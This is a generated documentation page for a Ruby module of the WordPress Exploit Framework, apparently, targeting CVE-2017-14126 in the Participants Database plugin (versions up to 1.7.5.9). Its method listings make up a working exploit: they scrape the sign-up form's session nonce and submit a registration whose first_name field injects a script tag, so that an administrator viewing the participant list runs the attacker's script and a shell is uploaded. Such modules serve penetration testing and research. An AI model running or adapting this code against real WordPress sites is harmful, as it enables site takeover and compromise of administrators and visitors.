class Wpxf::Exploit::ParticipantsDatabaseV1759XssShellUpload
Attributes
session_hash[RW]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Participants Database <= 1.7.5.9 XSS Shell Upload', author: [ 'Benjamin Lim', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['CVE', '2017-14126'], ['WPVDB', '8896'] ], date: 'Sep 06 2017' ) register_options([ StringOption.new( name: 'sign_up_path', desc: 'The relative path of the Participants Database sign up page', required: true ) ]) end
Public Instance Methods
before_store()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 48 def before_store self.session_hash = fetch_nonce if session_hash.nil? emit_error 'Failed to retrieve session hash / nonce' return false end true end
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 31 def check check_plugin_version_from_readme('participants-database', '1.7.5.10') end
fetch_nonce()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 43 def fetch_nonce res = execute_get_request(url: sign_up_url) return res.body[/name="session_hash"\s+type="hidden"\s+value="([a-z0-9]+)"/i, 1] if res && res.code == 200 end
sign_up_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 39 def sign_up_url normalize_uri(full_uri, datastore['sign_up_path']) end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 59 def store_script execute_post_request( url: sign_up_url, body: { 'action' => 'signup', 'subsource' => 'participants-database', 'shortcode_page=' => datastore['sign_up_path'], 'thanks_page' => datastore['sign_up_path'], 'instance_index' => '2', 'pdb_data_keys' => '1.2.9.10', 'session_hash' => session_hash, 'first_name' => "<script>#{xss_include_script}</script>#{Wpxf::Utility::Text.rand_alpha(6)}", 'last_name' => Wpxf::Utility::Text.rand_alpha(6), 'email' => Wpxf::Utility::Text.rand_email, 'mailing_list' => 'No', 'submit_button' => 'Submit' } ) end
vulnerable_page()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 35 def vulnerable_page 'the page containing the participant list' end